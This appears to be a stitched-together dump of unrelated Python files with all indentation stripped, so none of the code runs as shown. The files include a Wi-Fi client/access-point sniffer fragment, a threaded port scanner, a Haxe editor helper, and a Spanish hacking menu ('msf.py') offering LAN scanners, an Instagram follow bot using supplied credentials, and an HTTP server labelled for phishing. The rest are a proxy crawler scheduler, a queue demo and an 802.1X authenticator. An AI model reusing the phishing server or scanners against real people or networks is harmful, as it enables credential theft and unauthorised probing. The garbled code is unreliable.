if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
main.py
|
import threading
import socket
from time import sleep
from datetime import datetime
from pythonping import ping
from sys import stdout, argv
import json
knownServices = {
21: "ftp",
22: "ssh",
53: "dns",
80: "http",
443: "https",
3306: "mysql",
3389: "rdp",
11211: "memcached"
}
class scan(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.targetIP = argv[1]
self.newDict = {}
def recognizeServices(self, ip, port):
if(port in knownServices):
self.newDict[ip]["ports"][port] = knownServices[port]
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mFound Port\x1b[97m: \x1b[95m%d \x1b[92mService\x1b[97m: \x1b[95m%s\x1b[97m" % (port, knownServices[port]))
else:
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mFound Port\x1b[97m: \x1b[95m%d \x1b[92mService\x1b[97m: \x1b[95mUnknown\x1b[97m" % port)
self.newDict[ip]["ports"][port] = "unknown"
def scan(self, ip, rangeToScan, tts):
sRange = int(rangeToScan.split('-')[0])
eRange = int(rangeToScan.split('-')[1])
for ports in range(sRange, eRange):
scanS = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
scanS.settimeout(tts)
scanC = scanS.connect_ex((ip, ports))
if scanC == 0:
self.recognizeServices(ip, ports)
scanS.close()
else:
scanS.close()
def run(self, ip):
activeThreads = []
threads_to_use = 255
delayScan = ping(ip, size=5, count=4)
if(float(delayScan.rtt_avg_ms) >= 1000):
ourDelay = 0.08
else:
ourDelay = delayScan.rtt_avg_ms / 1000 + 0.01
self.newDict[ip] = {}
self.newDict[ip]["ports"] = {}
port_a = 0
port_b = 257
self.totalSTime = datetime.now()
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mAssigning \x1b[95m%d \x1b[92mThreads to\x1b[97m: \x1b[95m%s\x1b[97m" % (threads_to_use, ip))
for x in range(0, threads_to_use):
port_range = "%d-%d" % (
port_a,
port_b
)
thread = threading.Thread(target=self.scan, args=(ip, port_range, ourDelay))
thread.start()
activeThreads.append(thread)
port_a += 257
port_b += 257
for threads in activeThreads:
threads.join()
activeThreads.remove(threads)
self.t2 = datetime.now()
if(22 in self.newDict[ip]['ports']):
self.newDict[ip]["type"] = "Possible server"
else:
self.newDict[ip]["type"] = "Possible home router"
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mIP\x1b[97m: \x1b[95m%s \x1b[92mdone.\x1b[97m" % ip)
self.saveStats(self.newDict)
def saveStats(self, dictionary):
with open('data.json', 'w+')as f:
json.dump(dictionary, f, indent=4)
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mSaved infos to data.json\x1b[97m")
def main(self):
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mStarting threads for scanning.\x1b[97m")
self.run(self.targetIP)
sleep(0.2)
total = self.t2 - self.totalSTime
print("\x1b[95m[\x1b[92mSCANNER\x1b[95m]\x1b[92mTotal Scanning Time\x1b[97m: \x1b[95m%s\x1b[97m" % total)
return True
scan().main()
|
haxe_helper.py
|
import sys, sublime, sublime_plugin
import subprocess, time
import os, signal
import errno
from subprocess import Popen, PIPE
from datetime import datetime
import threading
import traceback
import shlex
import re
def HaxeComplete_inst():
try: # Python 3
from ..HaxeComplete import HaxeComplete
except (ValueError): # Python 2
from HaxeComplete import HaxeComplete
return HaxeComplete.inst
spaceChars = re.compile("\s")
wordChars = re.compile("[a-z0-9._]", re.I)
importLine = re.compile("^([ \t]*)import\s+([a-z0-9._*]+);", re.I | re.M)
packageLine = re.compile("package\s*([a-z0-9.]*);", re.I)
compactFunc = re.compile("\(.*\)")
compactProp = re.compile(":.*\.([a-z_0-9]+)", re.I)
libLine = re.compile("([^:]*):[^\[]*\[(dev\:)?(.*)\]")
classpathLine = re.compile("Classpath : (.*)")
typeDecl = re.compile("(class|interface|enum|typedef|abstract)\s+([A-Z][a-zA-Z0-9_]*)\s*(<[a-zA-Z0-9_,]+>)?" , re.M )
libFlag = re.compile("-lib\s+(.*?)")
skippable = re.compile("^[a-zA-Z0-9_\s]*$")
inAnonymous = re.compile("[{,]\s*([a-zA-Z0-9_\"\']+)\s*:\s*$" , re.M | re.U )
extractTag = re.compile("<([a-z0-9_-]+).*\s(name|main|path)=\"([a-z0-9_./-]+)\"", re.I)
extractTagName = re.compile("<([a-z0-9_-]+).*\s", re.I)
variables = re.compile("var\s+([^:;(\s]*)", re.I)
functions = re.compile("function\s+([^;\.\(\)\s]*)", re.I)
functionParams = re.compile("function\s+[a-zA-Z0-9_]+\s*\(([^\)]*)", re.M)
paramDefault = re.compile("(=\s*\"*[^\"]*\")", re.M)
isType = re.compile("^[A-Z][a-zA-Z0-9_]*$")
comments = re.compile("(//[^\n\r]*?[\n\r]|/\*(.*?)\*/)", re.MULTILINE | re.DOTALL )
haxeVersion = re.compile("(Haxe|haXe) Compiler (([0-9]\.[0-9])\.?[0-9]?)",re.M)
haxeFileRegex = "^(.+):(\\d+): (?:lines \\d+-\\d+|character(?:s \\d+-| )(\\d+)) : (.*)$"
controlStruct = re.compile( "\s*(if|switch|for|while)\s*\($" );
try:
STARTUP_INFO = subprocess.STARTUPINFO()
STARTUP_INFO.dwFlags |= subprocess.STARTF_USESHOWWINDOW
STARTUP_INFO.wShowWindow = subprocess.SW_HIDE
except (AttributeError):
STARTUP_INFO = None
try :
stexec = __import__("exec")
ExecCommand = stexec.ExecCommand
AsyncProcess = stexec.AsyncProcess
except ImportError as e :
import Default
stexec = getattr( Default , "exec" )
ExecCommand = stexec.ExecCommand
AsyncProcess = stexec.AsyncProcess
unicode = str #dirty...
def cache(filename, data=None):
cache_dir = os.path.join(
sublime.packages_path(), 'User', 'Haxe.cache')
cache_file = os.path.join(cache_dir, filename)
if not os.path.exists(cache_dir):
try:
os.makedirs(cache_dir)
except OSError as e:
if e.errno != errno.EEXIST:
return None
# read
if data is None:
try:
f = open(cache_file, 'r')
data = f.read()
f.close()
return data
except:
return None
# write
try:
f = open(cache_file, 'w')
f.write(data)
f.close()
return data
except:
pass
return None
def runcmd( args, input=None ):
try:
if int(sublime.version()) >= 3000 :
p = Popen(args, stdout=PIPE, stderr=PIPE, stdin=PIPE, startupinfo=STARTUP_INFO)
else:
p = Popen([a.encode(sys.getfilesystemencoding()) for a in args], stdout=PIPE, stderr=PIPE, stdin=PIPE, startupinfo=STARTUP_INFO)
if isinstance(input, unicode) :
input = input.encode('utf-8')
out, err = p.communicate(input=input)
return (out.decode('utf-8') if out else '', err.decode('utf-8') if err else '')
except (OSError, ValueError) as e:
err = u'Error while running %s: %s' % (args[0], e)
if int(sublime.version()) >= 3000 :
return ("",err)
else:
return ("", err.decode('utf-8'))
def show_quick_panel(_window, options, done, flags=0, sel_index=0):
sublime.set_timeout(lambda: _window.show_quick_panel(options, done, flags, sel_index), 10)
class runcmd_async(object):
"""
Enables to run subprocess commands in a different thread with TIMEOUT option.
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
command = None
process = None
status = None
output, error = '', ''
def __init__(self, command):
if isinstance(command, str):
command = shlex.split(command)
self.command = command
def run(self, timeout=None, **kwargs):
""" Run a command then return: (status, output, error). """
def target(**kwargs):
try:
self.process = subprocess.Popen(self.command, **kwargs)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
except:
self.error = traceback.format_exc()
self.status = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.status, self.output, self.error
|
msf.py
|
#! /usr/bin/python3
# -*- coding: utf-8 -*-
import zlib
import os
import base64
import threading
from multiprocessing import Process
import time
import sys
import pickle
import zipfile
import logging
import socket
import subprocess
import datetime
try:
import requests
except:
print('estamos instalando el modulo requests, por favor espere')
print(subprocess.getstatusoutput('pip3 install requests')[1])
print(subprocess.getstatusoutput('pip install requests')[1])
import requests
try:
from instabot import Bot
except:
print('estamos instalando el modulo instabot, por favor espere')
print(subprocess.getstatusoutput('pip3 install instabot')[1])
print(subprocess.getstatusoutput('pip install instabot')[1])
from instabot import Bot
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except:
print('estamos instalando el modulo http, por favor espere')
print(subprocess.getstatusoutput('pip3 install http')[1])
print(subprocess.getstatusoutput('pip install http')[1])
from http.server import BaseHTTPRequestHandler, HTTPServer
from sys import argv
from socket import gethostbyaddr
__VERSION__ = "1.0"
__AUTOR__ = "\033[0;36m 〇├ℳ⅀៘※⃫៙※ጠതШ┗┛┏┓┗┛DESMON┗┛┏┓┗┛Шതጠ※៙※៘⅀ℳ┤〇\033[1;37m"
ipEstatic = subprocess.getstatusoutput(
"GET http://www.vermiip.es/ | grep 'Tu IP pública es' | cut -d ':' -f2 | cut -d '<' -f1")[1]
print('para ayuda pon el comando: help')
def banner():
if sys.platform == 'linux' or sys.platform == 'linux2' or sys.platform == 'mac':
os.system('clear')
elif sys.platform == 'win32':
os.system('cls')
else:
os.system('clear')
print("""
\033[1;31m░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
\033[1;31m░░\033[1;32m░█▄█░█▀▀░▀█▀░█▀▀░█▀▄░█▀█░█▀▄░█▀▀░▀█▀░█▀▀░█▀▄\033[1;31m░░
\033[1;31m░░\033[1;32m░█░█░█▀▀░░█░░█▀▀░█▀▄░█▀▀░█▀▄░█▀▀░░█░░█▀▀░█▀▄\033[1;31m░░
\033[1;31m░░\033[1;32m░▀░▀░▀▀▀░░▀░░▀▀▀░▀░▀░▀░░░▀░▀░▀▀▀░░▀░░▀▀▀░▀░▀\033[1;31m░░
\033[1;31m░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░\033[1;37m"""+"\n"+__AUTOR__)
def MetadataZip(file):
try:
zf = zipfile.ZipFile(str(file), "r")
for info in zf.infolist():
print(info.filename)
print(" Comment: " + str(info.comment))
print(" Modified: " + str(datetime.datetime(*info.date_time)))
print(" System: " + str(info.create_system) +" (0=MS-DOS OS-2, 3=Unix)")
print(" ZIP version: " + str(info.create_version))
print(" Compressed: " + str(info.compress_size) + " bytes")
print(" Uncompressed: " + str(info.file_size) + " bytes")
zf.close()
except FileNotFoundError:
print('este archivo no esiste, asegurate de introducirlo bien.')
def follower(user, contrasena, user_objetivo):
for i in range(0, 101):
mi_bot = Bot()
mi_bot.login(username=str(user), password=str(contrasena))
mi_bot.follow_followers(user_objetivo)
def CodingBase85Text(text):
data = base64.b85encode(text.encode('utf-8'), pad=False)
print('salida:\033[1;32m '+str(data.decode())+"\033[1;37m")
def DecodingBase85Text(text):
data = base64.b85decode(text.encode())
print('salida:\033[1;32m '+str(data)+"\033[1;37m")
def CodingBase85File(text):
data = base64.b85encode(text.encode('utf-8'), pad=False)
file = open("archivo_encriptado85", "w")
file.write(data.decode())
file.close()
def DecodingBase85File(text):
data = base64.b85decode(text.encode('utf-8'))
file = open("archivo_desencriptado85", "w")
file.write(data.decode())
file.close()
def EncriptBinary(text):
file = open(str(text), "r")
file_bin = open('archivo_binario', "wb")
text = file.read()
pickle.dump(str(text), file_bin)
file_bin.close()
file.close()
def DecodingBinary(file):
fichero = open(str(file), "rb")
dataOput = pickle.load(fichero)
fichero.close()
fichero = open("archivo_desencriptado.txt", "w")
fichero.write(str(dataOput))
fichero.close()
print('salida:\033[1;32m '+dataOput+"\033[1;37m")
def YourDataInfo(ipEstatic):
print("\n\n\a\ntu ip estatica o publica es: " + str(ipEstatic))
print("tu sistema operativo(OS) es: " + str(sys.platform))
print("tiempo: " + str(datetime.date.today()))
print('directorio: ' + str(os.getcwd()))
print("nombre del equipo: " + str(socket.gethostname()))
print("tu ip_v4 es: " + str(socket.gethostbyname(socket.gethostname()))+"\n\n\a")
def nmapDemoTcp(host, MiniPort, MaxPort):
# host = '192.168.1.1'
# MaxPort = 54 # puerto por el que se empieza a escanear
# MiniPort = 1 # puerto maximo a escanear
number = 1 # el numero de conexiones que lleva creadas
OpenPort = []
esitenNetwork = []
try:
while True:
if MiniPort < MaxPort and 65536 >= MaxPort:
try:
#time.sleep(0.04)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, proto=0, fileno=None)
# empieza a escanear por el puerto escaneado
sock.connect((str(host), int(MiniPort)))
# muestra si la conecsion fue establecida
print('conexion establecida,' + str(host) + ':' +
str(MiniPort) + ' el puerto: ' + str(MiniPort))
sock.close()
OpenPort.append(MiniPort)
number = number + 1
esitenNetwork.append(host+":"+str(MiniPort))
# print(OpenPort)
except ConnectionRefusedError:
print('El puerto: ' + str(MiniPort) + ' no esta abierto')
MiniPort = MiniPort + 1
else:
print('Escaneo completo')
print(str(esitenNetwork))
break
except KeyboardInterrupt:
print(str(esitenNetwork))
def conect(ip):
print('\n\n\n')
url = 'http://' + str(ip) + '/'
p = requests.get(url, stream=True)
print('contenido Html: \n'+str(p.content))
print(p.cookies)
print(p.encoding) # returns 'utf-8'
print(p.status_code) # returns 200
print(p.elapsed) # returns datetime.timedelta(0, 1, 666890)
print(p.url) # returns 'https://tutsplus.com/'
print(p.history)
file = open('pagina_web.html', 'w')
file.write(str(p.content))
file.close()
def scannNetwork(IpMinima, IpMaxima):
if int(IpMaxima) == 1:
IpMaxima += 1
def scan(addr, port):
#creates a new socket using the given address family.
socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#setting up the default timeout in seconds for new socket object
socket.setdefaulttimeout(0.1)
#returns 0 if connection succeeds else raises error
result = socket_obj.connect_ex((addr,port)) #address and port in the tuple format
#closes te object
socket_obj.close()
return result
# lista de puertos a escanear
def start():
try:
ports=[1, 5, 7, 9, 11, 13, 17, 18, 19, 20, 21, 22, 23, 25, 42, 43, 53, 63, 66, 80, 115, 139, 443, 591, 445, 1080, 1234, 6969, 8080, 8000, 42004] # puertos mas usados a escanear.
existenNetwork=list()
# bucle por todas las ip del rango 192.168.1.*
for i in range(int(IpMinima),int(IpMaxima)):
addr="192.168.1.{}".format(i)
for port in ports:
result=scan(addr, port)
if result==0:
print(addr, port, "\033[1;32mAbierto\033[1;37m")
existenNetwork.append((str(addr), str(port)))
else:
print(addr, port, "\033[1;31mCerrado\033[1;37m")
os.system('clear')
print('\033[1;32respuesta en crudo: '+str(existenNetwork)+"\033[1;37")
except KeyboardInterrupt:
os.system('clear')
print('\033[1;32respuesta en crudo: '+str(existenNetwork)+"\033[1;37")
start()
def serverHtpp(hosts, port, data, ipEstatic):
try:
print("\n\n\n\nserver abierto en el host: " + str(hosts) + "\npor el puerto: " + str(port) + "\n\a url para ti: http://" +
str(hosts) + ":" + str(port)+"//\nruta para la vitima: http://"+str(ipEstatic)+":"+str(port)+"/")
print('Servidor iniciado, usa <Ctrl-C> para parar el servidor.\n')
try:
file = open(str(data), "r")
data = file.read()
file.close()
except FileNotFoundError:
print('no se pudo abrir el archivo por que no existe.')
print('el contenido de tu archivo es: \n'+data)
class S(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
logging.info("Solicitud GET,\nPath: %s\nHeaders:\n%s\n", str(
self.path), str(self.headers))
self._set_response()
self.wfile.write(str(data).format(self.path).encode('utf-8'))
def do_POST(self):
# <--- Gets the size of data
content_length = int(self.headers['Content-Length'])
# <--- Gets the data itself
post_data = self.rfile.read(content_length)
logging.info("solicitud POST,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(
self.path), str(self.headers), post_data.decode('utf-8'))
self._set_response()
self.wfile.write("Solicitud POST para {}".format(
self.path).encode('utf-8'))
try:
def run(hosts, port, server_class=HTTPServer, handler_class=S):
logging.basicConfig(level=logging.INFO)
server_address = (str(hosts), int(port))
httpd = server_class(server_address, handler_class)
logging.info('Iniciando server Http...\n')
try:
httpd.serve_forever()
except:
httpd.server_close()
logging.info('Stopping httpd...\n')
# server.serve_forever()
except:
print('server cerrado.')
hilo1 = threading.Thread(target=run(hosts, port))
hilo1.setDaemon(True)
hilo1.start()
banner()
except KeyboardInterrupt:
http.server_close()
banner()
print("server finalizado")
YourDataInfo(ipEstatic)
if __name__ == '__main__':
while True:
banner()
opcion = str(input(">>: "))
if opcion == '1':
file = str(input('archivo al que obtener metadatos: '))
MetadataZip(file)
file = None
elif opcion == '2':
user = str(input('tu cuenta de instagram: '))
contrasena = str(input('tu contrasena: '))
user_objetivo = str(input('usuario al que subir 100 seguidores: '))
follower(user, contrasena, user_objetivo)
user = None
contrasena = None
contrasena = None
elif opcion == '3':
text = str(input('texto a codificar en base85: '))
CodingBase85Text(text)
text = None
elif opcion == '4':
text = str(input('texto a descodificar en base85: '))
DecodingBase85Text(text)
text = None
elif opcion == '5':
text = str(input('archivo a codificar en base85: '))
CodingBase85File(text)
text = None
elif opcion == '6':
text = str(input('archivo a descodificar en base85: '))
DecodingBase85File(text)
text = None
elif opcion == '7':
text = str(input('archivo a codificar en binario: '))
file = open(str(text), 'r')
text = file.read()
file.close()
EncriptBinary(text)
text = None
elif opcion == '8':
file = str(input('archivo a descodificar en binario: '))
DecodingBinary(file)
file = None
elif opcion == '9':
YourDataInfo(ipEstatic)
print('esta es tu info')
elif opcion == '10':
# str(input())
host = str(input('ip a la que escanear sus puertos: '))
MiniPort = int(input('puerto por el que empezar a escanear: '))
MaxPort = int(input('puerto maximo a escanear(maximo existente 65535): '))
nmapDemoTcp(host, MiniPort, MaxPort)
elif opcion == '11':
ip = str(input('ip o url a la que hacer peticion get: '))
conect(ip)
elif opcion == '12':
IpMinima = str(input('ultimo numero de la ip por la que empezar a escanear(para toda la red 1): '))
IpMaxima = int(input('ultimo numero de la ip por la que acabar de escanear(para toda la red 255): '))
scannNetwork(IpMinima, IpMaxima)
elif opcion == '13':
port = str(input('puerto en el que abrir el server: '))
data = str(input('archivo con contenido html, php, css, o javascript que usar: '))
serverHtpp('127.0.0.1', port, data, ipEstatic)
data = None
port = None
elif opcion == 'help' or opcion == '14':
print("""
\topciones: usos
\t
\t 1 \tobtencion de metadatos de archivos .zip\n
\t 2 \t seguidores de intagram.\n
\t 3 \t codificar texto en base85\n
\t 4 \t descodificar texto en base85\n
\t 5 \t codificar archivos en base85\n
\t 6 \t descodificar archivos en base85\n
\t 7 \t codificar archivos en binario\n
\t 8 \t descodificar archivos en binario\n
\t 9 \t tu informacion\n
\t 10\t escaner de puertos individual\n
\t 11\t peticion get de tipo http a una ip o url(scraping)\n
\t 12\tescaner de hosts con el uso de un solo puerto\n
\t 13\t server http, para phising y otros usos\n
\t 14\t ayuda\n
\t 15\t salir\n
""")
elif opcion == '15':
break
sys.exit()
elif opcion == 'desmon':
print('por favor, si tuvo algun problema contacte con migo.')
else:
print('introduze una opcion correcta. :(')
input('\n\a\nEnter por favor...')
#except KeyboardInterrupt:
# print('algo as echo mal. :(')
|
deploy.py
|
__all__ = ['GeventSchedule']
import threading
import time
import schedule
from BusinessCentralLayer.middleware.redis_io import *
from BusinessCentralLayer.sentinel import noticer
from BusinessLogicLayer.cluster import __task__
from config import REDIS_SECRET_KEY, SINGLE_TASK_CAP, CRAWLER_SEQUENCE, ENABLE_COROUTINE, LAUNCH_INTERVAL, logger
class GeventSchedule(object):
def __init__(self, go: bool = ENABLE_COROUTINE, deploy_cluster=CRAWLER_SEQUENCE, cap=SINGLE_TASK_CAP,
crontab=LAUNCH_INTERVAL):
# 任务队列
self.deploy_cluster = deploy_cluster
# 协程加速
self.go = go
# 单机采集极限
self.cap = cap
# 任务间隔</min>
self.crontab = crontab
# 接入集群
self.rc = RedisClient()
self.rc_len = dict(zip(self.deploy_cluster, [1] * 3))
def push_task(self, task_name: str) -> bool:
"""
@param task_name:
@return:
"""
# 输入参数的数据类型错误
if not isinstance(task_name, str):
logger.error(f'The input type is wrong({task_name})')
return False
# 输入的参数不在模型的权限范围中
if task_name not in self.deploy_cluster:
logger.error(f'Spelling error in input({task_name}),Please choose from {self.deploy_cluster}')
return False
try:
# 判断缓冲队列是否已达单机采集极限
task_name = task_name.lower()
self.rc_len[f'{task_name}'] = self.rc.__len__(REDIS_SECRET_KEY.format(f'{task_name}'))
logger.info(f'[TEST] ||正在检查({task_name}) 任务队列...')
# 若已达或超过单机采集极限,则休眠任务
if self.rc_len[f"{task_name}"] >= self.cap:
logger.debug(f'[SLEEP] || 任务队列已满 ({task_name}) ({self.rc_len[f"{task_name}"]}/{self.cap})')
return True
finally:
# 无论队列是否已满,执行一次ddt
self.ddt(class_=task_name)
try:
# 执行采集任务,通过self.go决定是否启动协程加速
logger.info(f'[RUN] || ({task_name}) 采集任务启动')
__task__.loads_task(task_name, self.go)
# 判断任务是否完全失败,既单个类型链接的所有采集任务全部失败->Abnormal
if self.rc.__len__(REDIS_SECRET_KEY.format(f'{task_name}')) < self.rc_len[f'{task_name}']:
logger.error(f'[CRITICAL]Abnormal collection task({task_name})')
else:
return True
except Exception as e:
# 捕获未知错误
logger.error(f'[ERROR]{self.__class__.__name__}({task_name}) crawler engine panic {e}')
finally:
# 单个类型的链接采集结束
logger.success('[OVER] || 任务结束 {}({})'.format(self.__class__.__name__, task_name))
@logger.catch()
def run_check(self, class_: str) -> None:
"""
启动任务:以非部署模式,传递参数
@param class_:
--传入的应是 config 中 crawler seq中的参数,如`v2ray`/`ssr`/`trojan`
--确保操作的原子性,不要一次性传入多个参数,
--正确的做法是通过<协程引擎>的消息队列形式驱动多任务
--或使用for迭代work_seq顺序驱动多任务
@return:
"""
__task__.loads_task(class_, self.go, startup=False, loads_=True)
# self.push_task(class_)
def ddt(self, class_: str = None) -> None:
"""
@param class_: subscribe type `ssr` or `v2ray` or `trojan` ...
@return:
"""
if class_ is None:
for item in self.deploy_cluster:
threading.Thread(target=RedisDataDisasterTolerance().run, args=(item,)).start()
elif isinstance(class_, str) and class_ in self.deploy_cluster:
RedisDataDisasterTolerance().run(class_)
else:
logger.warning('{}.ddt() 输入参数错误,可能的原因为:类型错误/不在crawler_seq工作队列内'.format(self.__class__.__name__))
def run(self) -> None:
# logger.warning('This is a development server. Do not use it in a production deployment.')
try:
for task_name in self.deploy_cluster:
try:
schedule.every(self.crontab['action']).minutes.do(self.push_task, task_name=task_name)
schedule.every(self.crontab['refresh']).minutes.do(self.rc.refresh,
key_name=REDIS_SECRET_KEY.format(task_name))
logger.info(f"start {task_name}/crontab:{self.crontab['action']} minutes")
except schedule.IntervalError:
logger.error('interval set error')
self.crontab['action'] += 5
while True:
schedule.run_pending()
time.sleep(1)
except Exception as err:
logger.exception('Exception occurred ||{}'.format(err))
noticer.send_email(text_body='{}'.format(err), to='self')
except KeyboardInterrupt as err:
logger.stop('Forced stop ||{}'.format(err))
if __name__ == '__main__':
GeventSchedule().run()
|
net04_sing_dance_queue.py
|
"""Queue"""
'''
@Time : 2018/1/22 下午4:58
@Author : scrappy_zhang
@File : net04_sing_dance_queue.py
'''
import multiprocessing
import time
def sing(name, sing_name):
for i in range(5):
print(name, '正在唱歌%s呢 %d' % (sing_name, i))
time.sleep(1) # 休息1秒
while True:
if not q.empty():
value = q.get() # 从队列中读取数据
print('Jam收到了', value)
else:
break
def dance(**kwargs):
dancer = kwargs['dancer']
q.put('花') # 向队列中写入花数据
print('杰克逊向Jam递了一朵花')
for i in range(5):
print('%s正在伴舞呢 %d' % (dancer, i))
time.sleep(1) # 休息1秒
if __name__ == '__main__':
singer = 'Jam'
sing_name = '不露声色'
q = multiprocessing.Queue() # 创建队列
p1 = multiprocessing.Process(target=sing, args=(singer, sing_name)) # 创建唱歌进程
p2 = multiprocessing.Process(target=dance, kwargs={'dancer': '杰克逊'}) # 创建跳舞进程
p1.start() # 开始运行进程sing
p2.start() # 开始运行进程dance
|
authenticator.py
|
"""Authenticator module"""
from __future__ import absolute_import
from eap_module import EapModule
from heartbeat_scheduler import HeartbeatScheduler
from radius_module import RadiusModule, RadiusPacketInfo, RadiusSocketInfo, port_id_to_int
from message_parser import IdentityMessage, FailureMessage
import json
import threading
import time
import utils
class AuthStateMachine:
"""Authenticator state machine"""
START = "start"
SUPPLICANT = "Talk to Supplicant"
RADIUS = "Talk to RADIUS server"
FAIL = "Test Failed"
SUCCESS = "Test Succeeded"
def __init__(self, src_mac, auth_mac, idle_time, retry_count,
eap_send_callback, radius_send_callback, auth_callback):
self.state = None
self._state_lock = threading.Lock()
self._timer_lock = threading.RLock()
self.logger = utils.get_logger('AuthSM')
self.src_mac = src_mac
self.eap_send_callback = eap_send_callback
self.radius_send_callback = radius_send_callback
self.auth_callback = auth_callback
self.identity = None
self.authentication_mac = auth_mac
self.radius_state = None
self.radius_access_reject = None
self._idle_time = idle_time
self._max_retry_count = retry_count
self._current_timeout = None
self._retry_func = None
self._retry_args = None
self._current_retries = None
def initialize(self):
"""Initialize state machine"""
self._state_transition(self.START)
self._set_timeout(self._idle_time)
self._set_retry_actions(retry_func=self.eap_send_callback, retry_args=[self.src_mac])
def _state_transition(self, target, expected=None):
with self._state_lock:
if expected is not None:
message = 'state was %s expected %s' % (self.state, expected)
assert self.state == expected, message
self.logger.debug('Transition for %s: %s -> %s', self.src_mac, self.state, target)
self.state = target
def received_eapol_start(self):
"""Received EAPOL start on EAP socket"""
self._state_transition(self.SUPPLICANT, self.START)
self._set_timeout(self._idle_time)
self._set_retry_actions(retry_func=self.eap_send_callback, retry_args=[self.src_mac])
self.eap_send_callback(self.src_mac)
def received_eap_request(self, eap_message):
"""Received EAP request"""
if isinstance(eap_message, IdentityMessage) and not self.identity:
self.identity = eap_message.identity
self._state_transition(self.RADIUS, self.SUPPLICANT)
port_id = port_id_to_int(self.authentication_mac)
radius_packet_info = RadiusPacketInfo(
eap_message, self.src_mac, self.identity, self.radius_state, port_id)
self._set_timeout(self._idle_time)
self._set_retry_actions(
retry_func=self.radius_send_callback, retry_args=[radius_packet_info])
self.radius_send_callback(radius_packet_info)
def received_radius_response(self, payload, radius_state, packet_type):
"""Received RADIUS access channel"""
self.radius_state = radius_state
self.logger.info('Received %s response %s' % (self.src_mac, packet_type))
if packet_type == 'RadiusAccessReject':
self.radius_access_reject = True
self._state_transition(self.FAIL, self.RADIUS)
eap_message = FailureMessage(self.src_mac, 255)
self.auth_callback(self.src_mac, False)
else:
eap_message = payload
if packet_type == 'RadiusAccessAccept':
self._state_transition(self.SUCCESS, self.RADIUS)
self.auth_callback(self.src_mac, True)
else:
self._state_transition(self.SUPPLICANT, self.RADIUS)
self._set_timeout(self._idle_time)
self._set_retry_actions(
retry_func=self.eap_send_callback, retry_args=[self.src_mac, eap_message])
self.eap_send_callback(self.src_mac, eap_message)
def _set_timeout(self, timeout_time=None, clear=False):
with self._timer_lock:
if clear:
self._current_timeout = None
else:
self._current_timeout = time.time() + timeout_time
def _set_retry_actions(self, retry_func=None, retry_args=None):
self._retry_func = retry_func
self._retry_args = list(retry_args)
self._current_retries = 0
def _clear_retry_actions(self):
self._retry_func = None
self._retry_args = None
self._current_retries = 0
def handle_timer(self):
"""Handle timer and check if timeout is exceeded"""
with self._timer_lock:
if self._current_timeout:
if time.time() > self._current_timeout:
if self._current_retries < self._max_retry_count:
self._current_retries += 1
self._set_timeout(self._idle_time)
self._retry_func(*self._retry_args)
else:
self._handle_timeout()
def _handle_timeout(self):
self._state_transition(self.FAIL)
self._set_timeout(clear=True)
eap_message = FailureMessage(self.src_mac, 255)
self.auth_callback(self.src_mac, False)
self.eap_send_callback(self.src_mac, eap_message)
class Authenticator:
"""Authenticator to manage Authentication flow"""
HEARTBEAT_INTERVAL = 3
IDLE_TIME = 9
RETRY_COUNT = 3
RADIUS_PORT = 1812
EAPOL_IDLE_TIME = 180
def __init__(self, config_file):
self.state_machines = {}
self.results = {}
self.radius_access_reject = {}
self.eap_module = None
self.radius_module = None
self.logger = utils.get_logger('Authenticator')
self._config_file = config_file
self._threads = []
self._radius_socket_info = None
self._radius_secret = None
self._radius_id = None
self._interface = None
self._idle_time = None
self._max_retry_count = None
self._current_timeout = None
self._debug = False
self._setup()
def _load_config(self):
